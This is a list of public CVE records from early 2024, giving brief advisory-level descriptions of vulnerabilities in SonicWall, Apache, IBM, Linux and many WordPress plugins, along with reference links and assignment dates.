CVE 2024 22395 Candidate Improper access control vulnerability has been identified in the SMA100 SSL-VPN virtual office portal, which in specific conditions could potentially enable a remote authenticated attacker to associate another user's MFA mobile application. MISC:https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0001 | URL:https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0001 Assigned (20240110)
CVE 2024 22394 Candidate An improper authentication vulnerability has been identified in SonicWall SonicOS SSL-VPN feature, which in specific conditions could allow a remote attacker to bypass authentication. This issue affects only firmware version SonicOS 7.1.1-7040. MISC:https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0003 | URL:https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0003 Assigned (20240110)
CVE 2024 22393 Candidate Unrestricted Upload of File with Dangerous Type vulnerability in Apache Answer.This issue affects Apache Answer: through 1.2.1. Pixel Flood Attack by uploading large pixel files will cause server out of memory. A logged-in user can cause such an attack by uploading an image when posting content. Users are recommended to upgrade to version [1.2.5], which fixes the issue. MISC:https://lists.apache.org/thread/f58l6dr4r74hl6o71gn47kmn44vw12cv | URL:https://lists.apache.org/thread/f58l6dr4r74hl6o71gn47kmn44vw12cv | MLIST:[oss-security] 20240222 CVE-2024-22393: Apache Answer: Pixel Flood Attack by uploading the large pixel file | URL:http://www.openwall.com/lists/oss-security/2024/02/22/1 Assigned (20240110)
CVE 2024 2239 Candidate The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Premium Magic Scroll module in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://premiumaddons.com/change-log/ | URL:https://premiumaddons.com/change-log/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/254f3a1c-0d5d-499b-9da7-129f21ba70af?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/254f3a1c-0d5d-499b-9da7-129f21ba70af?source=cve Assigned (20240306)
CVE 2024 22389 Candidate When BIG-IP is deployed in high availability (HA) and an iControl REST API token is updated, the change does not sync to the peer device. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated MISC:https://my.f5.com/manage/s/article/K32544615 | URL:https://my.f5.com/manage/s/article/K32544615 Assigned (20240201)
CVE 2024 22388 Candidate Certain configuration available in the communication channel for encoders could expose sensitive data when reader configuration cards are programmed. This data could include credential and device administration keys. MISC:https://support.hidglobal.com/ | URL:https://support.hidglobal.com/ | MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-037-01 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-037-01 Assigned (20240125)
CVE 2024 22386 Candidate A race condition was found in the Linux kernel's drm/exynos device driver in exynos_drm_crtc_atomic_disable() function. This can result in a null pointer dereference issue, possibly leading to a kernel panic or denial of service issue. MISC:https://bugzilla.openanolis.cn/show_bug.cgi?id=8147 | URL:https://bugzilla.openanolis.cn/show_bug.cgi?id=8147 Assigned (20240115)
CVE 2024 22383 Candidate Missing release of resource after effective lifetime (CWE-772) in the Controller 7000 resulted in HBUS connected T-Series readers to not automatically recover after coming under attack over the RS-485 interface, resulting in a persistent denial of service. This issue affects: All variants of the Gallagher Controller 7000 9.00 prior to vCR9.00.231204b (distributed in 9.00.1507(MR1)), 8.90 prior to vCR8.90.240209b (distributed in 8.90.1751 (MR3)), 8.80 prior to vCR8.80.240209a (distributed in 8.80.1526 (MR4)), 8.70 prior to vCR8.70.240209a (distributed in 8.70.2526 (MR6)). MISC:https://security.gallagher.com/en-NZ/Security-Advisories/CVE-2024-22383 | URL:https://security.gallagher.com/en-NZ/Security-Advisories/CVE-2024-22383 Assigned (20240205)
CVE 2024 22380 Candidate Electronic Delivery Check System (Ministry of Agriculture, Forestry and Fisheries The Agriculture and Rural Development Project Version) March, Heisei 31 era edition Ver.14.0.001.002 and earlier improperly restricts XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker. MISC:https://jvn.jp/en/jp/JVN01434915/ | URL:https://jvn.jp/en/jp/JVN01434915/ | MISC:https://www.maff.go.jp/j/nousin/seko/nouhin_youryou/densi.html | URL:https://www.maff.go.jp/j/nousin/seko/nouhin_youryou/densi.html Assigned (20240112)
CVE 2024 2238 Candidate The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom Mouse Cursor module in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://premiumaddons.com/change-log/ | URL:https://premiumaddons.com/change-log/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/82e5fd9f-9a1f-4a4c-ac06-61bf65e3c8ab?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/82e5fd9f-9a1f-4a4c-ac06-61bf65e3c8ab?source=cve Assigned (20240306)
CVE 2024 22372 Candidate OS command injection vulnerability in ELECOM wireless LAN routers allows a network-adjacent attacker with an administrative privilege to execute arbitrary OS commands by sending a specially crafted request to the product. Affected products and versions are as follows: WRC-X1800GS-B v1.17 and earlier, WRC-X1800GSA-B v1.17 and earlier, WRC-X1800GSH-B v1.17 and earlier, WRC-X6000XS-G v1.09, and WRC-X6000XST-G v1.12 and earlier. MISC:https://jvn.jp/en/vu/JVNVU90908488/ | URL:https://jvn.jp/en/vu/JVNVU90908488/ | MISC:https://www.elecom.co.jp/news/security/20240123-01/ | URL:https://www.elecom.co.jp/news/security/20240123-01/ Assigned (20240110)
CVE 2024 22371 Candidate Exposure of sensitive data by by crafting a malicious EventFactory and providing a custom ExchangeCreatedEvent that exposes sensitive data. Vulnerability in Apache Camel.This issue affects Apache Camel: from 3.21.X through 3.21.3, from 3.22.X through 3.22.0, from 4.0.X through 4.0.3, from 4.X through 4.3.0. Users are recommended to upgrade to version 3.21.4, 3.22.1, 4.0.4 or 4.4.0, which fixes the issue. MISC:https://camel.apache.org/security/CVE-2024-22371.html | URL:https://camel.apache.org/security/CVE-2024-22371.html Assigned (20240109)
CVE 2024 22370 Candidate In JetBrains YouTrack before 2023.3.22666 stored XSS via markdown was possible MISC:https://www.jetbrains.com/privacy-security/issues-fixed/ | URL:https://www.jetbrains.com/privacy-security/issues-fixed/ Assigned (20240109)
CVE 2024 2237 Candidate The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Global Badge module in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://premiumaddons.com/change-log/ | URL:https://premiumaddons.com/change-log/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/35151561-6a80-4c2c-b87a-2dfe02aa6158?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/35151561-6a80-4c2c-b87a-2dfe02aa6158?source=cve Assigned (20240306)
CVE 2024 22369 Candidate Deserialization of Untrusted Data vulnerability in Apache Camel SQL ComponentThis issue affects Apache Camel: from 3.0.0 before 3.21.4, from 3.22.0 before 3.22.1, from 4.0.0 before 4.0.4, from 4.1.0 before 4.4.0. Users are recommended to upgrade to version 4.4.0, which fixes the issue. If users are on the 4.0.x LTS releases stream, then they are suggested to upgrade to 4.0.4. If users are on 3.x, they are suggested to move to 3.21.4 or 3.22.1 MISC:https://lists.apache.org/thread/3dko781dy2gy5l3fs48p56fgp429yb0f | URL:https://lists.apache.org/thread/3dko781dy2gy5l3fs48p56fgp429yb0f Assigned (20240109)
CVE 2024 22368 Candidate The Spreadsheet::ParseXLSX package before 0.28 for Perl can encounter an out-of-memory condition during parsing of a crafted XLSX document. This occurs because the memoize implementation does not have appropriate constraints on merged cells. FEDORA:FEDORA-2024-5f136f5d10 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WNJVC4C5C5V44DNOZ5BHVU53CDXPB2OJ/ | FEDORA:FEDORA-2024-fa14bfd3b5 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6R7NYWVVZYDZIQC5YEXNHZM6VEE26SJV/ | MISC:https://github.com/haile01/perl_spreadsheet_excel_rce_poc/blob/main/parse_xlsx_bomb.md | MISC:https://metacpan.org/dist/Spreadsheet-ParseXLSX/changes | MLIST:[debian-lts-announce] 20240127 [SECURITY] [DLA 3723-1] libspreadsheet-parsexlsx-perl security update | URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00018.html | MLIST:[oss-security] 20240110 CVE-2024-22368: Spreadsheet::ParseXLSX for Perl is vulnerable to DoS via out-of-memory bugs | URL:http://www.openwall.com/lists/oss-security/2024/01/10/2 Assigned (20240109)
CVE 2024 22366 Candidate Active debug code exists in Yamaha wireless LAN access point devices. If a logged-in user who knows how to use the debug function accesses the device's management page, this function can be enabled by performing specific operations. As a result, an arbitrary OS command may be executed and/or configuration settings of the device may be altered. Affected products and versions are as follows: WLX222 firmware Rev.24.00.03 and earlier, WLX413 firmware Rev.22.00.05 and earlier, WLX212 firmware Rev.21.00.12 and earlier, WLX313 firmware Rev.18.00.12 and earlier, and WLX202 firmware Rev.16.00.18 and earlier. MISC:http://www.rtpro.yamaha.co.jp/RT/FAQ/Security/JVNVU99896362.html | URL:http://www.rtpro.yamaha.co.jp/RT/FAQ/Security/JVNVU99896362.html | MISC:https://jvn.jp/en/vu/JVNVU99896362/ | URL:https://jvn.jp/en/vu/JVNVU99896362/ Assigned (20240109)
CVE 2024 22365 Candidate linux-pam (aka Linux PAM) before 1.6.0 allows attackers to cause a denial of service (blocked login process) via mkfifo because the openat call (for protect_dir) lacks O_DIRECTORY. MISC:http://www.openwall.com/lists/oss-security/2024/01/18/3 | MISC:https://github.com/linux-pam/linux-pam | MISC:https://github.com/linux-pam/linux-pam/commit/031bb5a5d0d950253b68138b498dc93be69a64cb | MISC:https://github.com/linux-pam/linux-pam/releases/tag/v1.6.0 Assigned (20240109)
CVE 2024 22362 Candidate Drupal contains a vulnerability with improper handling of structural elements. If this vulnerability is exploited, an attacker may be able to cause a denial-of-service (DoS) condition. MISC:https://github.com/drupal/drupal | URL:https://github.com/drupal/drupal | MISC:https://jvn.jp/en/jp/JVN63383723/ | URL:https://jvn.jp/en/jp/JVN63383723/ | MISC:https://www.drupal.org/ | URL:https://www.drupal.org/ | MISC:https://www.drupal.org/about/core/policies/core-release-cycles/schedule | URL:https://www.drupal.org/about/core/policies/core-release-cycles/schedule Assigned (20240109)
CVE 2024 22361 Candidate IBM Semeru Runtime 8.0.302.0 through 8.0.392.0, 11.0.12.0 through 11.0.21.0, 17.0.1.0 - 17.0.9.0, and 21.0.1.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 281222. MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/281222 | URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/281222 | MISC:https://www.ibm.com/support/pages/node/7116431 | URL:https://www.ibm.com/support/pages/node/7116431 Assigned (20240108)
CVE 2024 2236 Candidate A timing-based side-channel flaw was found in libgcrypt's RSA implementation. This issue may allow a remote attacker to initiate a Bleichenbacher-style attack, which can lead to the decryption of RSA ciphertexts. MISC:RHBZ#2268268 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2268268 | MISC:https://access.redhat.com/security/cve/CVE-2024-2236 | URL:https://access.redhat.com/security/cve/CVE-2024-2236 Assigned (20240306)
CVE 2024 22355 Candidate IBM QRadar Suite Products 1.10.12.0 through 1.10.18.0 and IBM Cloud Pak for Security 1.10.0.0 through 1.10.11.0 does not require that users should have strong passwords by default, which makes it easier for attackers to compromise user accounts. IBM X-Force ID: 280781. MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/280781 | URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/280781 | MISC:https://www.ibm.com/support/pages/node/7129328 | URL:https://www.ibm.com/support/pages/node/7129328 Assigned (20240108)
CVE 2024 22352 Candidate IBM InfoSphere Information Server 11.7 stores potentially sensitive information in log files that could be read by a local user. IBM X-Force ID: 280361. MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/280361 | URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/280361 | MISC:https://www.ibm.com/support/pages/node/7117184 | URL:https://www.ibm.com/support/pages/node/7117184 Assigned (20240108)
CVE 2024 22346 Candidate Db2 for IBM i 7.2, 7.3, 7.4, and 7.5 infrastructure could allow a local user to gain elevated privileges due to an unqualified library call. A malicious actor could cause user-controlled code to run with administrator privilege. IBM X-Force ID: 280203. MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/280203 | URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/280203 | MISC:https://www.ibm.com/support/pages/node/7140499 | URL:https://www.ibm.com/support/pages/node/7140499 Assigned (20240108)
CVE 2024 22337 Candidate IBM QRadar Suite 1.10.12.0 through 1.10.17.0 and IBM Cloud Pak for Security 1.10.0.0 through 1.10.11.0 stores potentially sensitive information in log files that could be read by a local user. IBM X-Force ID: 279977. MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/279977 | URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/279977 | MISC:https://www.ibm.com/support/pages/node/7118642 | URL:https://www.ibm.com/support/pages/node/7118642 Assigned (20240108)
CVE 2024 22336 Candidate IBM QRadar Suite 1.10.12.0 through 1.10.17.0 and IBM Cloud Pak for Security 1.10.0.0 through 1.10.11.0 stores potentially sensitive information in log files that could be read by a local user. IBM X-Force ID: 279976. MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/279976 | URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/279976 | MISC:https://www.ibm.com/support/pages/node/7118642 | URL:https://www.ibm.com/support/pages/node/7118642 Assigned (20240108)
CVE 2024 22335 Candidate IBM QRadar Suite 1.10.12.0 through 1.10.17.0 and IBM Cloud Pak for Security 1.10.0.0 through 1.10.11.0 stores potentially sensitive information in log files that could be read by a local user. IBM X-Force ID: 279975. MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/279975 | URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/279975 | MISC:https://www.ibm.com/support/pages/node/7118642 | URL:https://www.ibm.com/support/pages/node/7118642 Assigned (20240108)
CVE 2024 22332 Candidate The IBM Integration Bus for z/OS 10.1 through 10.1.0.2 AdminAPI is vulnerable to a denial of service due to file system exhaustion. IBM X-Force ID: 279972. MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/279972 | URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/279972 | MISC:https://https://www.ibm.com/support/pages/node/7116046 | URL:https://https://www.ibm.com/support/pages/node/7116046 Assigned (20240108)
CVE 2024 22331 Candidate IBM UrbanCode Deploy (UCD) 7.0 through 7.0.5.19, 7.1 through 7.1.2.15, 7.2 through 7.2.3.8, 7.3 through 7.3.2.3, and IBM UrbanCode Deploy (UCD) - IBM DevOps Deploy 8.0.0.0 could disclose sensitive user information when installing the Windows agent. IBM X-Force ID: 279971. MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/279971 | URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/279971 | MISC:https://www.ibm.com/support/pages/node/7114131 | URL:https://www.ibm.com/support/pages/node/7114131 Assigned (20240108)
CVE 2024 22320 Candidate IBM Operational Decision Manager 8.10.3 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146. MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/279146 | URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/279146 | MISC:https://www.ibm.com/support/pages/node/7112382 | URL:https://www.ibm.com/support/pages/node/7112382 Assigned (20240108)
CVE 2024 22319 Candidate IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, 8.11.1 and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145. MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/279145 | URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/279145 | MISC:https://www.ibm.com/support/pages/node/7112382 | URL:https://www.ibm.com/support/pages/node/7112382 Assigned (20240108)
CVE 2024 22318 Candidate IBM i Access Client Solutions (ACS) 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.4 is vulnerable to NT LAN Manager (NTLM) hash disclosure by an attacker modifying UNC capable paths within ACS configuration files to point to a hostile server. If NTLM is enabled, the Windows operating system will try to authenticate using the current user's session. The hostile server could capture the NTLM hash information to obtain the user's credentials. IBM X-Force ID: 279091. FULLDISC:20240213 IBM i Access Client Solutions / Remote Credential Theft / CVE-2024-22318 | URL:http://seclists.org/fulldisclosure/2024/Feb/7 | MISC:http://packetstormsecurity.com/files/177069/IBM-i-Access-Client-Solutions-Remote-Credential-Theft.html | MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/279091 | URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/279091 | MISC:https://www.ibm.com/support/pages/node/7116091 | URL:https://www.ibm.com/support/pages/node/7116091 Assigned (20240108)
CVE 2024 22317 Candidate IBM App Connect Enterprise 11.0.0.1 through 11.0.0.24 and 12.0.1.0 through 12.0.11.0 could allow a remote attacker to obtain sensitive information or cause a denial of service due to improper restriction of excessive authentication attempts. IBM X-Force ID: 279143. MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/279143 | URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/279143 | MISC:https://www.ibm.com/support/pages/node/7108661 | URL:https://www.ibm.com/support/pages/node/7108661 Assigned (20240108)
CVE 2024 22313 Candidate IBM Storage Defender - Resiliency Service 2.0 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. IBM X-Force ID: 278749. MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/278749 | URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/278749 | MISC:https://www.ibm.com/support/pages/node/7115261 | URL:https://www.ibm.com/support/pages/node/7115261 Assigned (20240108)
CVE 2024 22312 Candidate IBM Storage Defender - Resiliency Service 2.0 stores user credentials in plain clear text which can be read by a local user. IBM X-Force ID: 278748. MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/278748 | URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/278748 | MISC:https://www.ibm.com/support/pages/node/7115261 | URL:https://www.ibm.com/support/pages/node/7115261 Assigned (20240108)
CVE 2024 22310 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Formzu Inc. Formzu WP allows Stored XSS.This issue affects Formzu WP: from n/a through 1.6.7. MISC:https://patchstack.com/database/vulnerability/formzu-wp/wordpress-formzu-wp-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/formzu-wp/wordpress-formzu-wp-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240108)
CVE 2024 22309 Candidate Deserialization of Untrusted Data vulnerability in QuantumCloud ChatBot with AI.This issue affects ChatBot with AI: from n/a through 5.1.0. MISC:https://patchstack.com/database/vulnerability/chatbot/wordpress-ai-chatbot-plugin-5-1-0-unauthenticated-php-object-injection-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/chatbot/wordpress-ai-chatbot-plugin-5-1-0-unauthenticated-php-object-injection-vulnerability?_s_id=cve Assigned (20240108)
CVE 2024 22308 Candidate URL Redirection to Untrusted Site ('Open Redirect') vulnerability in smp7, wp.Insider Simple Membership.This issue affects Simple Membership: from n/a through 4.4.1. MISC:https://patchstack.com/database/vulnerability/simple-membership/wordpress-simple-membership-plugin-4-4-1-open-redirection-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/simple-membership/wordpress-simple-membership-plugin-4-4-1-open-redirection-vulnerability?_s_id=cve Assigned (20240108)
CVE 2024 22307 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Lab WP-Lister Lite for eBay allows Reflected XSS.This issue affects WP-Lister Lite for eBay: from n/a through 3.5.7. MISC:https://patchstack.com/database/vulnerability/wp-lister-for-ebay/wordpress-wp-lister-lite-for-ebay-plugin-3-5-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wp-lister-for-ebay/wordpress-wp-lister-lite-for-ebay-plugin-3-5-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240108)
CVE 2024 22306 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hometory Mang Board WP allows Stored XSS.This issue affects Mang Board WP: from n/a through 1.7.7. MISC:https://patchstack.com/database/vulnerability/mangboard/wordpress-mang-board-wp-plugin-1-7-7-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/mangboard/wordpress-mang-board-wp-plugin-1-7-7-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240108)
CVE 2024 22305 Candidate Authorization Bypass Through User-Controlled Key vulnerability in ali Forms Contact Form builder with drag & drop for WordPress – Kali Forms.This issue affects Contact Form builder with drag & drop for WordPress – Kali Forms: from n/a through 2.3.36. MISC:https://patchstack.com/database/vulnerability/kali-forms/wordpress-kali-forms-plugin-2-3-38-insecure-direct-object-references-idor-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/kali-forms/wordpress-kali-forms-plugin-2-3-38-insecure-direct-object-references-idor-vulnerability?_s_id=cve Assigned (20240108)
CVE 2024 22304 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Borbis Media FreshMail For WordPress.This issue affects FreshMail For WordPress: from n/a through 2.3.2. MISC:https://patchstack.com/database/vulnerability/freshmail-integration/wordpress-freshmail-for-wordpress-plugin-2-3-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/freshmail-integration/wordpress-freshmail-for-wordpress-plugin-2-3-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240108)
CVE 2024 22302 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ignazio Scimone Albo Pretorio On line allows Stored XSS.This issue affects Albo Pretorio On line: from n/a through 4.6.6. MISC:https://patchstack.com/database/vulnerability/albo-pretorio-on-line/wordpress-albo-pretorio-on-line-plugin-4-6-6-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/albo-pretorio-on-line/wordpress-albo-pretorio-on-line-plugin-4-6-6-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240108)
CVE 2024 22301 Candidate Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Ignazio Scimone Albo Pretorio On line.This issue affects Albo Pretorio On line: from n/a through 4.6.6. MISC:https://patchstack.com/database/vulnerability/albo-pretorio-on-line/wordpress-albo-pretorio-on-line-plugin-4-6-6-sensitive-data-exposure-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/albo-pretorio-on-line/wordpress-albo-pretorio-on-line-plugin-4-6-6-sensitive-data-exposure-vulnerability?_s_id=cve Assigned (20240108)
CVE 2024 22297 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Codeboxr CBX Map for Google Map & OpenStreetMap allows Stored XSS.This issue affects CBX Map for Google Map & OpenStreetMap: from n/a through 1.1.11. MISC:https://patchstack.com/database/vulnerability/cbxgooglemap/wordpress-cbx-map-for-google-map-openstreetmap-plugin-1-1-11-cross-site-scripting-xss-vulnerability-2?_s_id=cve | URL:https://patchstack.com/database/vulnerability/cbxgooglemap/wordpress-cbx-map-for-google-map-openstreetmap-plugin-1-1-11-cross-site-scripting-xss-vulnerability-2?_s_id=cve Assigned (20240108)
CVE 2024 22295 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RoboSoft Photo Gallery, Images, Slider in Rbs Image Gallery allows Stored XSS.This issue affects Photo Gallery, Images, Slider in Rbs Image Gallery: from n/a through 3.2.17. MISC:https://patchstack.com/database/vulnerability/robo-gallery/wordpress-robo-gallery-plugin-3-2-17-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/robo-gallery/wordpress-robo-gallery-plugin-3-2-17-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240108)
CVE 2024 22294 Candidate Exposure of Sensitive Information to an Unauthorized Actor vulnerability in IP2Location IP2Location Country Blocker.This issue affects IP2Location Country Blocker: from n/a through 2.33.3. MISC:https://patchstack.com/database/vulnerability/ip2location-country-blocker/wordpress-ip2location-country-blocker-plugin-2-33-3-sensitive-data-exposure-via-log-file-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/ip2location-country-blocker/wordpress-ip2location-country-blocker-plugin-2-33-3-sensitive-data-exposure-via-log-file-vulnerability?_s_id=cve Assigned (20240108)
CVE 2024 22293 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Andrea Tarantini BP Profile Search allows Reflected XSS.This issue affects BP Profile Search: from n/a through 5.5. MISC:https://patchstack.com/database/vulnerability/bp-profile-search/wordpress-bp-profile-search-plugin-5-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/bp-profile-search/wordpress-bp-profile-search-plugin-5-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240108)
CVE 2024 22292 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Delower WP To Do allows Stored XSS.This issue affects WP To Do: from n/a through 1.2.8. MISC:https://patchstack.com/database/vulnerability/wp-todo/wordpress-wp-to-do-plugin-1-2-8-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wp-todo/wordpress-wp-to-do-plugin-1-2-8-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240108)
CVE 2024 22291 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Marco Milesi Browser Theme Color.This issue affects Browser Theme Color: from n/a through 1.3. MISC:https://patchstack.com/database/vulnerability/browser-theme-color/wordpress-browser-theme-color-plugin-1-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/browser-theme-color/wordpress-browser-theme-color-plugin-1-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240108)
CVE 2024 22290 Candidate Cross-Site Request Forgery (CSRF) vulnerability in AboZain,O7abeeb,UnitOne Custom Dashboard Widgets allows Cross-Site Scripting (XSS).This issue affects Custom Dashboard Widgets: from n/a through 1.3.1. MISC:https://patchstack.com/database/vulnerability/custom-dashboard-widgets/wordpress-custom-dashboard-widgets-plugin-1-3-1-csrf-to-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/custom-dashboard-widgets/wordpress-custom-dashboard-widgets-plugin-1-3-1-csrf-to-xss-vulnerability?_s_id=cve Assigned (20240108)
CVE 2024 2229 Candidate CWE-502: Deserialization of Untrusted Data vulnerability exists that could cause remote code execution when a malicious project file is loaded into the application by a valid user. MISC:https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-072-02&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-072-02.pdf | URL:https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-072-02&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-072-02.pdf Assigned (20240306)
CVE 2024 22289 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in cybernetikz Post views Stats allows Reflected XSS.This issue affects Post views Stats: from n/a through 1.3. MISC:https://patchstack.com/database/vulnerability/post-views-stats/wordpress-post-views-stats-plugin-1-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/post-views-stats/wordpress-post-views-stats-plugin-1-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240108)
CVE 2024 22287 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Luděk Melichar Better Anchor Links allows Cross-Site Scripting (XSS).This issue affects Better Anchor Links: from n/a through 1.7.5. MISC:https://patchstack.com/database/vulnerability/better-anchor-links/wordpress-better-anchor-links-plugin-1-7-5-csrf-to-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/better-anchor-links/wordpress-better-anchor-links-plugin-1-7-5-csrf-to-xss-vulnerability?_s_id=cve Assigned (20240108)
CVE 2024 22286 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Aluka BA Plus – Before & After Image Slider FREE allows Reflected XSS.This issue affects BA Plus – Before & After Image Slider FREE: from n/a through 1.0.3. MISC:https://patchstack.com/database/vulnerability/ba-plus-before-after-image-slider-free/wordpress-ba-plus-plugin-1-0-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/ba-plus-before-after-image-slider-free/wordpress-ba-plus-plugin-1-0-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240108)
